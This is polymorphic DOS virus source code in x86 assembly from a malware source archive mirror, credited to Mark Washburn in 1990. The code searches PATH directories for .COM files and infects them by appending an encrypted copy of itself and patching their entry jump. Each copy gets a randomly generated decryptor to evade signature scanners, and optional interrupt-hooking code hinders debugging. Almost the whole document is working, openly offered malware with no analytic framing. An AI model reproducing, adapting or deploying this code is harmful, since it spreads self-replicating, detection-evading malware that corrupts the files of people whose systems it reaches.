mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 14:35:27 +00:00
4b9382ddbc
push
776 lines
23 KiB
NASM
776 lines
23 KiB
NASM
;
|
||
;
|
||
; Copyright (C) Mark Washburn, 1990. All Rights Reserved
|
||
;
|
||
;
|
||
; Inquires are directed to :
|
||
; Mark Washburn
|
||
; 4656 Polk Street NE
|
||
; Columbia Heights, MN 55421
|
||
; USA
|
||
;
|
||
;
|
||
;
|
||
;
|
||
code segment public 'CODE'
|
||
org 100h
|
||
;
|
||
assume cs:code,ds:code,es:code
|
||
;
|
||
|
||
;stopdebug equ 1 ; define this for disassembly trap code
|
||
int1vec equ 4
|
||
int3vec equ 12
|
||
;
|
||
dta_ptr equ -4
|
||
file_crea equ -8
|
||
file_attr equ -10
|
||
path_start_ptr equ -12
|
||
file_start_ptr equ -14
|
||
RAND_SEED equ -16
|
||
ptr1 equ -18 ; pointer to start of loop code
|
||
ptr2 equ -20 ; save data_begin pointer
|
||
dat1 equ -22 ; the random code used
|
||
dat2 equ -24 ; the decode length plus random length offset, max_msk
|
||
; to make the decode routine more difficult to detect
|
||
dat3 equ -26 ; the 'necessary crypt code' mask
|
||
;
|
||
IFNDEF stopdebug
|
||
local_stack equ 26
|
||
max_msk equ 0ffh ; this determines the maximum variance of length
|
||
ELSE
|
||
nobugptr equ -28
|
||
oldint3 equ -32
|
||
oldint1 equ -36
|
||
local_stack equ 36
|
||
max_msk equ 0ffh ; this determines the maximum variance of length
|
||
ENDIF
|
||
;
|
||
;
|
||
;
|
||
doscall macro call_type
|
||
ifnb <call_type>
|
||
mov ah, call_type
|
||
endif
|
||
int 21h
|
||
endm
|
||
;
|
||
setloc macro arg1,reg2
|
||
mov [bp + arg1],reg2
|
||
endm
|
||
;
|
||
getloc macro reg1,arg2
|
||
mov reg1,[bp + arg2]
|
||
endm
|
||
;
|
||
setdat macro arg1,reg2
|
||
mov [si + offset arg1 - offset data_begin],reg2
|
||
endm
|
||
;
|
||
getdat macro reg1,arg2
|
||
mov reg1,[si + offset arg2 - offset data_begin]
|
||
endm
|
||
;
|
||
regofs macro reg1,arg2
|
||
mov reg1,si
|
||
add reg1,offset (arg2 - data_begin)
|
||
endm
|
||
;
|
||
NOBUG1 macro
|
||
IFDEF stopdebug
|
||
INT 3
|
||
NOP
|
||
ENDIF
|
||
endm
|
||
;
|
||
nobug2 macro
|
||
IFDEF stopdebug
|
||
INT 3
|
||
ENDIF
|
||
endm
|
||
;
|
||
;
|
||
start:
|
||
jmp entry
|
||
;
|
||
;
|
||
;
|
||
MOV AH,0
|
||
INT 021h ; program code
|
||
; db 600h-6 dup (0)
|
||
; insert utility code here
|
||
;
|
||
entry:
|
||
|
||
|
||
IFDEF stopdebug
|
||
call precrypt
|
||
db 36 dup (090h) ; calculated length of offset(t41-t10)
|
||
ELSE
|
||
db 39 dup (090h) ; calculated length of offset(t41-t10)
|
||
ENDIF
|
||
;
|
||
; label the start of encoded section
|
||
entry2:
|
||
|
||
|
||
|
||
|
||
|
||
|
||
INCLUDE utility.asm <------- Manipulation Task Goes Here!
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
mov bp,sp ; allocate locals
|
||
sub sp,local_stack
|
||
;
|
||
push cx
|
||
movcmd: ; this label is used to locate the next instruction
|
||
mov dx,offset data_begin
|
||
setloc ptr2,dx ; save - will be modified in 'gencode'
|
||
IFDEF stopdebug
|
||
;
|
||
; save interrupt 1 and 3 vectors
|
||
;
|
||
push ds
|
||
mov ax,0
|
||
push ax
|
||
pop ds
|
||
cli
|
||
mov ax,ds:[int1vec]
|
||
setloc oldint1,ax
|
||
mov ax,ds:[int1vec+2]
|
||
setloc oldint1+2,ax
|
||
mov ax,ds:[int3vec]
|
||
setloc oldint3,ax
|
||
mov ax,ds:[int3vec+2]
|
||
setloc oldint3+2,ax
|
||
sti
|
||
pop ds
|
||
;
|
||
call bugon
|
||
ENDIF
|
||
mov si,dx
|
||
add si,(offset old_code - offset data_begin)
|
||
mov di,0100h
|
||
mov cx,03h
|
||
cld
|
||
repz movsb
|
||
mov si,dx
|
||
doscall 30h ; check DOS version
|
||
cmp al,0
|
||
NOBUG1 ; 0
|
||
jnz cont1 ; DOS > 2.0
|
||
jmp exit
|
||
cont1:
|
||
push es
|
||
doscall 2fh ; get program DTA
|
||
NOBUG1 ; 0
|
||
setloc dta_ptr,bx
|
||
NOBUG1 ; 0
|
||
setloc dta_ptr+2,es
|
||
pop es
|
||
regofs dx,my_dta
|
||
doscall 1ah ; set new DTA
|
||
push es
|
||
push si
|
||
mov es,ds:[02ch] ; environment address
|
||
mov di,0
|
||
loop1:
|
||
pop si
|
||
push si
|
||
add si,(offset path_chars - offset data_begin)
|
||
lodsb
|
||
mov cx,8000h
|
||
repnz scasb
|
||
mov cx,4
|
||
loop2:
|
||
lodsb
|
||
scasb
|
||
jnz loop1
|
||
loop loop2
|
||
pop si
|
||
pop es
|
||
setloc path_start_ptr,di
|
||
mov bx,si
|
||
add si,offset (file_name-data_begin)
|
||
mov di,si
|
||
jmp cont6
|
||
nobug2
|
||
next_path:
|
||
cmp word ptr [bp + path_start_ptr],0
|
||
jnz cont3
|
||
jmp exit2
|
||
nobug2
|
||
cont3:
|
||
push ds
|
||
push si
|
||
mov ds,es:[002ch]
|
||
|
||
mov di,si
|
||
mov si,es:[bp+path_start_ptr]
|
||
add di,offset (file_name-data_begin)
|
||
loop3:
|
||
lodsb
|
||
cmp al,';' ; 3bh
|
||
jz cont4
|
||
cmp al,0
|
||
jz cont5
|
||
stosb
|
||
jmp loop3
|
||
nobug2
|
||
cont5:
|
||
mov si,0
|
||
cont4:
|
||
pop bx
|
||
pop ds
|
||
mov [bp+path_start_ptr],si
|
||
cmp ch,0ffh
|
||
jz cont6
|
||
mov al,'\' ; 5ch
|
||
stosb
|
||
cont6:
|
||
mov [bp+file_start_ptr],di
|
||
mov si,bx
|
||
add si,(offset com_search-offset data_begin)
|
||
mov cx,6
|
||
repz movsb
|
||
mov si,bx
|
||
mov ah,04eh
|
||
regofs dx,file_name
|
||
mov cx,3
|
||
doscall
|
||
jmp cont7
|
||
nobug2
|
||
next_file:
|
||
doscall 04fh
|
||
cont7:
|
||
jnb cont8
|
||
jmp next_path
|
||
nobug2
|
||
cont8:
|
||
mov ax,[si+offset(my_dta-data_begin)+016h] ; low time byte
|
||
and al,01fh
|
||
cmp al,01fh
|
||
jz next_file
|
||
IFNDEF stopdebug
|
||
cmp word ptr [si+offset(my_dta-data_begin)+01ah],0fa00h
|
||
; file length compared; need 1.5 k spare, see rnd off
|
||
ELSE
|
||
cmp word ptr [si+offset(my_dta-data_begin)+01ah],0f800h
|
||
ENDIF
|
||
jz next_file ; with virus length
|
||
cmp word ptr [si+offset(my_dta-data_begin)+01ah],0ah
|
||
; file to short
|
||
jz next_file
|
||
mov di,[bp+file_start_ptr]
|
||
push si
|
||
add si,offset(my_dta-data_begin+01eh)
|
||
move_name:
|
||
lodsb
|
||
stosb
|
||
cmp al,0
|
||
jnz move_name
|
||
pop si
|
||
mov ax,04300h
|
||
regofs dx,file_name
|
||
doscall
|
||
setloc file_attr,cx
|
||
mov ax,04301h
|
||
and cx,0fffeh
|
||
regofs dx,file_name
|
||
doscall
|
||
mov ax,03d02h
|
||
regofs dx,file_name
|
||
doscall
|
||
jnb cont9
|
||
jmp exit3
|
||
nobug2
|
||
cont9:
|
||
mov bx,ax
|
||
mov ax,05700h
|
||
doscall
|
||
setloc file_crea,cx
|
||
setloc file_crea+2,dx
|
||
cont10:
|
||
mov ah,3fh
|
||
mov cx,3
|
||
regofs dx,old_code
|
||
doscall
|
||
NOBUG1 ; 1
|
||
jb cont98
|
||
NOBUG1
|
||
cmp ax,3
|
||
NOBUG1
|
||
jnz cont98
|
||
NOBUG1
|
||
mov ax,04202h
|
||
NOBUG1 ;1
|
||
mov cx,0
|
||
mov dx,0
|
||
doscall
|
||
jnb cont99
|
||
cont98:
|
||
jmp exit4
|
||
cont99:
|
||
NOBUG1 ; 2
|
||
push bx ; save file handle
|
||
NOBUG1
|
||
mov cx,ax
|
||
push cx
|
||
NOBUG1
|
||
sub ax,3
|
||
NOBUG1
|
||
setdat jump_code+1,ax
|
||
add cx,(offset data_begin-offset entry+0100h)
|
||
NOBUG1
|
||
mov di,si
|
||
NOBUG1
|
||
sub di,offset data_begin-offset movcmd-1
|
||
NOBUG1
|
||
mov [di],cx
|
||
;
|
||
doscall 02ch ; seed the random number generator
|
||
xor dx,cx
|
||
NOBUG1
|
||
setloc rand_seed,dx
|
||
NOBUG1 ; 2
|
||
call random
|
||
NOBUG1 ; 3
|
||
getloc ax,rand_seed
|
||
NOBUG1 ; 3
|
||
and ax,max_msk ; add a random offset to actual length
|
||
NOBUG1 ; 3
|
||
add ax,offset (data_end-entry2) ; set decode length
|
||
NOBUG1 ; 3
|
||
setloc dat2,ax ; save the decode length
|
||
NOBUG1 ; 3
|
||
setdat (t13+1),ax ; set decode length in 'mov cx,xxxx'
|
||
pop cx ; restore the code length of file to be infected
|
||
NOBUG1 ; 3
|
||
add cx,offset (entry2-entry+0100h) ; add the length
|
||
; of uncoded area plus file offset
|
||
setdat (t11+1),cx ; set decode begin in 'mov di,xxxx'
|
||
NOBUG1 ; 3
|
||
call random
|
||
getloc ax,rand_seed
|
||
NOBUG1 ; 3
|
||
setloc dat1,ax ; save this random key in dat1
|
||
setdat (t12+1),ax ; set random key in 'mov ax,xxxx'
|
||
NOBUG1 ; 3
|
||
mov di,si
|
||
NOBUG1 ; 3
|
||
sub di,offset (data_begin-entry)
|
||
NOBUG1 ; 3
|
||
mov bx,si
|
||
add bx,offset (l11-data_begin) ; table L11 address
|
||
mov word ptr [bp+dat3],000000111b ; required routines
|
||
call gen2 ; generate first part of decrypt
|
||
setloc ptr1,di ; save the current counter to resolve 'loop'
|
||
add bx,offset (l21-l11) ; add then next tables' offset
|
||
NOBUG1 ; 3
|
||
mov word ptr [bp+dat3],010000011b ; required plus 'nop'
|
||
NOBUG1 ; 3
|
||
call gen2 ; generate second part of decrypt
|
||
add bx,offset (l31-l21) ; add the next offset
|
||
NOBUG1
|
||
call gen2 ; generate third part of decrypt
|
||
mov cx,2 ; store the loop code
|
||
getloc si,ptr2
|
||
NOBUG1 ; 3
|
||
add si,offset (t40-t10) ; point to the code
|
||
repz movsb ; move the code
|
||
getloc ax,ptr1 ; the loop address pointer
|
||
sub ax,di ; the current address
|
||
dec di ; point to the jump address
|
||
stosb ; resolve the jump
|
||
; fill in the remaining code
|
||
l991:
|
||
getloc cx,ptr2 ; get the data_begin pointer
|
||
sub cx,offset (data_begin-entry2) ; locate last+1 entry
|
||
cmp cx,di ; are we there yet?
|
||
je l992 ; if not then fill some more space
|
||
mov dx,0h ; any code is ok
|
||
call gencode ; generate the code
|
||
jmp l991
|
||
nobug2
|
||
l992:
|
||
getloc si,ptr2 ; restore si to point to data area ;
|
||
push si
|
||
mov di,si
|
||
NOBUG1 ; 4
|
||
mov cx,offset(end1-begin1) ; move code
|
||
add si,offset(begin1-data_begin)
|
||
NOBUG1 ; 4
|
||
add di,offset(data_end-data_begin+max_msk) ; add max_msk
|
||
mov dx,di ; set subroutine start
|
||
repz movsb ; move the code
|
||
pop si
|
||
pop bx ; restore handle
|
||
call setrtn ; find this address
|
||
add ax,06h ; <- the number necessary for proper return
|
||
push ax
|
||
jmp dx ; continue with mask & write code
|
||
; continue here after return from mask & write code
|
||
NOBUG1 ; 4
|
||
jb exit4
|
||
cmp ax,offset(data_end-entry)
|
||
NOBUG1 ; 4
|
||
jnz exit4
|
||
mov ax,04200h
|
||
mov cx,0
|
||
mov dx,0
|
||
doscall
|
||
jb exit4
|
||
mov ah,040h
|
||
mov cx,3
|
||
NOBUG1 ; 4
|
||
regofs dx,jump_code
|
||
doscall
|
||
exit4:
|
||
getloc dx,file_crea+2
|
||
getloc cx,file_crea
|
||
and cx,0ffe0h
|
||
or cx,0001fh
|
||
mov ax,05701h
|
||
doscall
|
||
doscall 03Eh ; close file
|
||
exit3:
|
||
mov ax,04301h
|
||
getloc cx,file_attr
|
||
regofs dx,file_name
|
||
doscall
|
||
exit2:
|
||
push ds
|
||
getloc dx,dta_ptr
|
||
getloc ds,dta_ptr+2
|
||
doscall 01ah
|
||
pop ds
|
||
exit:
|
||
pop cx
|
||
xor ax,ax
|
||
xor bx,bx
|
||
xor dx,dx
|
||
xor si,si
|
||
mov sp,bp ; deallocate locals
|
||
mov di,0100h
|
||
push di
|
||
IFDEF stopdebug
|
||
call bugoff
|
||
ENDIF
|
||
ret
|
||
;
|
||
; common subroutines
|
||
;
|
||
;
|
||
random proc near
|
||
;
|
||
getloc cx,rand_seed ; get the seed
|
||
xor cx,813Ch ; xor random pattern
|
||
add cx,9248h ; add random pattern
|
||
ror cx,1 ; rotate
|
||
ror cx,1 ; three
|
||
ror cx,1 ; times.
|
||
setloc rand_seed,cx ; put it back
|
||
and cx,7 ; ONLY NEED LOWER 3 BITS
|
||
push cx
|
||
inc cx
|
||
xor ax,ax
|
||
stc
|
||
rcl ax,cl
|
||
pop cx
|
||
ret ; return
|
||
;
|
||
random endp
|
||
;
|
||
setrtn proc near
|
||
;
|
||
pop ax ; ret near
|
||
push ax
|
||
ret
|
||
;
|
||
setrtn endp
|
||
;
|
||
gencode proc near
|
||
;
|
||
l999:
|
||
call random
|
||
test dx,ax ; has this code been used yet?
|
||
jnz l999 ; if this code was generated - try again
|
||
or dx,ax ; set the code as used in dx
|
||
mov ax,cx ; the look-up index
|
||
sal ax,1
|
||
push ax
|
||
xlat
|
||
mov cx,ax ; the count of instructions
|
||
pop ax
|
||
inc ax
|
||
xlat
|
||
add ax,[bp+ptr2] ; ax = address of code to be moved
|
||
mov si,ax
|
||
repz movsb ; move the code into place
|
||
ret
|
||
;
|
||
gencode endp
|
||
;
|
||
gen2 proc near
|
||
;
|
||
mov dx,0h ; used code
|
||
l990:
|
||
call gencode
|
||
mov ax,dx ; do we need more code
|
||
and ax,[bp+dat3] ; the mask for the required code
|
||
cmp ax,[bp+dat3]
|
||
jne l990 ; if still need required code - loop again
|
||
ret
|
||
;
|
||
gen2 endp
|
||
;
|
||
IFDEF stopdebug
|
||
doint3:
|
||
push bx
|
||
mov bx,sp
|
||
push ax
|
||
push si
|
||
mov si,word ptr [bx+02]
|
||
inc word ptr [bx+02] ; point to next address
|
||
setloc nobugptr,si
|
||
lodsb ; get the byte following int 3
|
||
xor byte ptr [si],al
|
||
mov al,[bx+7] ; set the trap flag
|
||
or al,1
|
||
mov [bx+7],al
|
||
pop si
|
||
pop ax
|
||
pop bx
|
||
iret
|
||
;
|
||
doint1:
|
||
push bx
|
||
mov bx,sp
|
||
push ax
|
||
push si
|
||
getloc si,nobugptr
|
||
lodsb
|
||
xor byte ptr [si],al
|
||
mov al,[bx+7] ; clear the trap flag
|
||
and al,0feh
|
||
mov [bx+7],al
|
||
pop si
|
||
pop ax
|
||
pop bx
|
||
bugiret:
|
||
iret
|
||
;
|
||
bugon:
|
||
pushf
|
||
push ds
|
||
push ax
|
||
mov ax,0
|
||
push ax
|
||
pop ds
|
||
getloc ax,ptr2
|
||
sub ax,offset(data_begin-doint3)
|
||
cli
|
||
mov ds:[int3vec],ax
|
||
getloc ax,ptr2
|
||
sub ax,offset(data_begin-doint1)
|
||
mov ds:[int1vec],ax
|
||
push cs
|
||
pop ax
|
||
mov ds:[int1vec+2],ax
|
||
mov ds:[int3vec+2],ax
|
||
sti
|
||
pop ax
|
||
pop ds
|
||
popf
|
||
ret
|
||
;
|
||
bugoff:
|
||
pushf
|
||
push ds
|
||
push ax
|
||
mov ax,0
|
||
push ax
|
||
pop ds
|
||
|
||
getloc ax,oldint3
|
||
cli
|
||
mov ds:[int3vec],ax
|
||
getloc ax,oldint1
|
||
mov ds:[int1vec],ax
|
||
getloc ax,oldint1+2
|
||
mov ds:[int1vec+2],ax
|
||
getloc ax,oldint3+2
|
||
mov ds:[int3vec+2],ax
|
||
sti
|
||
|
||
pop ax
|
||
pop ds
|
||
popf
|
||
ret
|
||
;
|
||
ENDIF
|
||
;
|
||
;
|
||
; the data area
|
||
;
|
||
data_begin label near
|
||
;
|
||
T10 LABEL NEAR
|
||
T11: MOV DI,0FFFFH
|
||
T12: MOV AX,0FFFFH
|
||
T13: MOV CX,0FFFFH
|
||
T14: CLC
|
||
T15: CLD
|
||
T16: INC SI
|
||
T17: DEC BX
|
||
T18: NOP
|
||
T19 LABEL NEAR
|
||
;
|
||
T20 LABEL NEAR
|
||
T21: XOR [DI],AX
|
||
T22: XOR [DI],CX
|
||
T23: XOR DX,CX
|
||
T24: XOR BX,CX
|
||
T25: SUB BX,AX
|
||
T26: SUB BX,CX
|
||
T27: SUB BX,DX
|
||
T28: NOP
|
||
T29 LABEL NEAR
|
||
;
|
||
T30 LABEL NEAR
|
||
T31: INC AX
|
||
T32: INC DI
|
||
T33: INC BX
|
||
T34: INC SI
|
||
T35: INC DX
|
||
T36: CLC
|
||
T37: DEC BX
|
||
T38: NOP
|
||
T39 LABEL NEAR
|
||
;
|
||
T40: LOOP T20
|
||
T41 LABEL NEAR
|
||
;
|
||
L11: DB OFFSET (T12-T11),OFFSET (T11-data_begin)
|
||
L12: DB OFFSET (T13-T12),OFFSET (T12-data_begin)
|
||
L13: DB OFFSET (T14-T13),OFFSET (T13-data_begin)
|
||
L14: DB OFFSET (T15-T14),OFFSET (T14-data_begin)
|
||
L15: DB OFFSET (T16-T15),OFFSET (T15-data_begin)
|
||
L16: DB OFFSET (T17-T16),OFFSET (T16-data_begin)
|
||
L17: DB OFFSET (T18-T17),OFFSET (T17-data_begin)
|
||
L18: DB OFFSET (T19-T18),OFFSET (T18-data_begin)
|
||
;
|
||
L21: DB OFFSET (T22-T21),OFFSET (T21-data_begin)
|
||
L22: DB OFFSET (T23-T22),OFFSET (T22-data_begin)
|
||
L23: DB OFFSET (T24-T23),OFFSET (T23-data_begin)
|
||
L24: DB OFFSET (T25-T24),OFFSET (T24-data_begin)
|
||
L25: DB OFFSET (T26-T25),OFFSET (T25-data_begin)
|
||
L26: DB OFFSET (T27-T26),OFFSET (T26-data_begin)
|
||
L27: DB OFFSET (T28-T27),OFFSET (T27-data_begin)
|
||
L28: DB OFFSET (T29-T28),OFFSET (T28-data_begin)
|
||
;
|
||
L31: DB OFFSET (T32-T31),OFFSET (T31-data_begin)
|
||
L32: DB OFFSET (T33-T32),OFFSET (T32-data_begin)
|
||
L33: DB OFFSET (T34-T33),OFFSET (T33-data_begin)
|
||
L34: DB OFFSET (T35-T34),OFFSET (T34-data_begin)
|
||
L35: DB OFFSET (T36-T35),OFFSET (T35-data_begin)
|
||
L36: DB OFFSET (T37-T36),OFFSET (T36-data_begin)
|
||
L37: DB OFFSET (T38-T37),OFFSET (T37-data_begin)
|
||
L38: DB OFFSET (T39-T38),OFFSET (T38-data_begin)
|
||
;
|
||
;
|
||
;
|
||
; this routine is relocated after the end of data area
|
||
; this routine encrypts, writes, and decrypts the virus code
|
||
;
|
||
begin1:
|
||
getloc cx,dat2 ; get off (data_end-entry2) plus max_msk
|
||
getloc ax,dat1 ; get decode ket
|
||
mov di,si ; and set the begin encrypt address
|
||
sub di,offset (data_begin-entry2)
|
||
call crypt
|
||
mov ah,040h
|
||
mov cx,offset data_end-offset entry
|
||
mov dx,si
|
||
sub dx,offset data_begin-offset entry
|
||
doscall
|
||
pushf ; save the status of the write
|
||
push ax
|
||
getloc cx,dat2 ; get off (data_end-entry2) plus max_msk
|
||
getloc ax,dat1
|
||
mov di,si
|
||
sub di,offset (data_begin-entry2)
|
||
call crypt
|
||
pop ax ; restore the DOS write's status
|
||
popf
|
||
ret
|
||
;
|
||
crypt:
|
||
xor [di],ax
|
||
xor [di],cx
|
||
inc ax
|
||
inc di
|
||
loop crypt
|
||
ret
|
||
end1:
|
||
;
|
||
; global work space and constants
|
||
;
|
||
old_code: db 090h,090h,090h
|
||
jump_code: db 0e9h,0,0
|
||
com_search: db '*.COM',0
|
||
path_chars: db 'PATH='
|
||
file_name: db 40h DUP (0)
|
||
my_dta: db 2Bh DUP (0)
|
||
db 0,0,0
|
||
|
||
data_end label near
|
||
IFDEF stopdebug
|
||
;
|
||
scan_bytes db 0CCh,090h
|
||
;
|
||
precrypt:
|
||
mov bp,sp ; allocate locals
|
||
sub sp,local_stack
|
||
doscall 02ch ; seed the random number generator
|
||
xor dx,cx
|
||
setloc rand_seed,dx
|
||
call random
|
||
mov di,offset start
|
||
push ds
|
||
pop es
|
||
lp999:
|
||
mov cx,08000h
|
||
mov si,offset scan_bytes
|
||
lodsb
|
||
repnz scasb
|
||
cmp cx,0
|
||
je done998
|
||
cmp di,offset data_end
|
||
jge done998
|
||
lodsb
|
||
scasb
|
||
jnz lp999
|
||
call random
|
||
getloc ax,rand_seed
|
||
dec di
|
||
mov [di],al
|
||
inc di
|
||
xor [di],al
|
||
inc di ; skip the masked byte
|
||
jmp short lp999
|
||
done998:
|
||
mov sp,bp
|
||
ret
|
||
ENDIF
|
||
|
||
code ends
|
||
end start
|
||
|